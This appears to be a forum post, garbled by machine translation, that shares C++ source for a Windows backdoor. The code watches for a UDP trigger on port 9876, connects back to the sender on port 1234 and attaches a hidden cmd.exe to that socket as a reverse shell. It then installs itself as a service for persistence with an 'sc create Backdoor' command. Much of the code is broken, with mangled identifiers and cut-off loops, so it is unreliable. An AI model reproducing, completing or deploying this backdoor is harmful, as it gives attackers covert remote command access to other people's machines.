your 1234 fracture These can be changed // The best way is the Decode UDP package. . Then analyze the content. . . Judgment whether to open Trojans. . . . //Time is running out. . . .

IF (can) {if (SourcePort == 9876) {StartBackDoor (& Resock, SourceIpAddr);} can = false;}} int msgetip (char * ipin, char * iPout) {char chostname [80] = "; if (gethostname (chostname, 80)) == Socket_

Error) Return False; struct hostent * host = gethostbyname (chOSTNAME); if (null! = Host) {Struct in

_

Addr; int i = 0; while (host-> h

_

AddR

_

List [i]! = null) {memcpy (& addr, host-> h

_

AddR

_

List [i], sizeof (addr)); if (addr.s

_

Un.n

_

Un

_

B.S

_

B1 == 192 && addr.s

_

Un.n

_

Un

_

B.S

_

B2 == 168) {IF (Strlen) == 0) {STRCPY (ipin, inet

_

NTOA (AddR));}} else if (addr.s

_

Un.s

_

Un

_

B.S

_

B1 == 172 && (addr.s

_

Un.s

_

Un

_

B.S

_

B2> = 16 && addr.s

_

Un.s

_

Un

_

B.S

_

B2 <= 131)) {IF (Strlen) == 0) {STRCPY (ipin, inet

_

NTOA (AddR));}} else if (addr.s

_

Un.s

_

Un

_

B.S

_

B1 == 10) {IF (Strlen) == 0) {STRCPY (ipin, inet

_

NTOA (AddR));}} else {IF (Strlen (iPout) == 0) {STRCPY (iPout, Inet

_

NTOA (AddR);}} i ;} if (Strlen (iPout) == 0) {strun (iPout, ipin);} if (ipIN) == 0) {strcpy (ipIN, IPOUT);} Return 1;} return 0;} void startbackdoor (socket * sock, char * ipaddr) {int REC; // startwsa (); setSocketHandle (SOCK); REC = ContareServer (SOCK, 1234, IPADDR); RETURNMESSAGE (SOCK, WELCOMEBUFF) CreatePiPeinsock (); Switch (REC) {Case 0: CloseSocket (resock); cancon = true; break; cas 1: cancon = false; break;}} This is

the main body of the service.

There is also a function to add the service automatically; I had no time and will pack it up later (ZV will write it).

The CreateService() function can be used for this.

The service part still needs improvement from everyone.

Con.cpp

Code

#include "headerf.h" // ----------------------------------------- ---------------------------------- Startupinfo Si; Process_information PI; Socket Resock; // ----- -------------------------------------------------- ----- void StartWSA () {WSADATA wsa; WSAStartup (MAKEWORD (2,2), & wsa);} int ContoReServer (SOCKET * sock, unsigned short port, char * reAddr) {int namelen; struct sockaddr_in server_addr; server_addr .sin_family = AF_INET; server_addr.sin_port = htons (port); server_addr.sin_addr.S_un.S_addr = inet_addr (reAddr); namelen = sizeof (server_addr); if (connect (* sock, (SOCKADDR *) & server_addr, namelen) < 0) RETURN 0; RETURN 1;} int setsocketHandle (Socket * Sock) {* sock = wsasocket (pf_inet, sock_stream, ipproto_tcp, null, 0, 0); if (* sock == Socket_ERROR) RETURN 0; RETURN 1;} Void ReturnMessage (Socket * Sock, Char * MSG) {IF (Strlen (MSG) <= 0) Return; Send (* Sock, MSG, Strlen (MSG), 0);} // This is the re-order SI Resock .... is equal to a simple pipe. . // Not too much time. In order to save things. . It is best to achieve CMD.// to be rewritten into pipe CREATEPIPE () .. // This can analyze the data. . To add other controls. . . . . . void CreatePipeInSock () {memset (& si, 0, sizeof (si)); si.cb = sizeof (si); si.dwFlags = STARTF_USESHOWWINDOW STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = si.hStdOutput = si. HSTDERROR = (void *) Resock; CreateProcess (Null, "Cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, & SI, & PI);} backdoor.cpp

Code

#include "headerf.h" // ----------------------------------------- ---------------------------------- Const int c_neventct = 3; const Int c_neventindexpause = 0; const Int c_neventindexContinue = 1; const int c_nEventIndexStop = 2; HANDLE g_arEventControl [c_nEventCt]; SERVICE_STATUS_HANDLE g_ssh; DWORD g_dwStatus = SERVICE_STOPPED; #pragma argsused // service status to SCMvoid SetStatus (DWORD dwStatus) {SERVICE_STATUS ss = {SERVICE_WIN32_OWN_PROCESS, SERVICE_STOPPED, SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP, NO_ERROR , 0, 1, 5000}; ss.dwCurrentState = dwStatus; SetServiceStatus (g_ssh, & ss); g_dwStatus = dwStatus;} // command processing VOID __stdcall Handler (DWORD dwCtl) {switch (dwCtl) {case SERVICE_CONTROL_STOP: WSACleanup ();break; default: // nomal break;}} bool HandleControl () {bool bContinueRunning (true); DWORD dwWait = WaitForMultipleObjects (c_nEventCt, g_arEventControl, FALSE, 0); int nIndex = dwWait - WAIT_OBJECT_0; if (nIndex> = 0 && NINDEX

switch (nIndex) {case c_nEventIndexPause: SetStatus (SERVICE_PAUSED); break; case c_nEventIndexContinue: SetStatus (SERVICE_RUNNING); break; case c_nEventIndexStop: SetStatus (SERVICE_STOP_PENDING); bContinueRunning = false; break;}} return (bContinueRunning);} VOID __stdcall ServiceMain (DWORD dwArgc, LPSTR * lpszArgv) {g_arEventControl [c_nEventIndexPause] = CreateEvent (NULL, TRUE, FALSE, NULL); g_arEventControl [c_nEventIndexContinue] = CreateEvent (NULL, TRUE, FALSE, NULL); g_arEventControl [c_nEventIndexStop] = CreateEvent (NULL, True, false, null; g_ssh = registerServiceCtrlHandler (LPSZARGV [0], Handler); setStatus (service_start_pending); setStatus (Servi CE_RUNNING); while (HandleControl ()) {if (g_dwStatus == SERVICE_RUNNING) {StartSniffer ();}} for (int nEvent = 0; nEvent

CONEVENT ", servicemain}, {null, null}}; startServiceCtrldispatcher (ARSVC); Return 0;} Manual plus

service

After compiling

Enter CMD

Run SC CREATE Casual A Name BinPath = PATH

Example: Sc Create Backdoor BinPath = C: /BackDoor.exe

This is very rough. When I finish military training and have time, I'll come back and write more. 88

The attachment was written in BCB6.

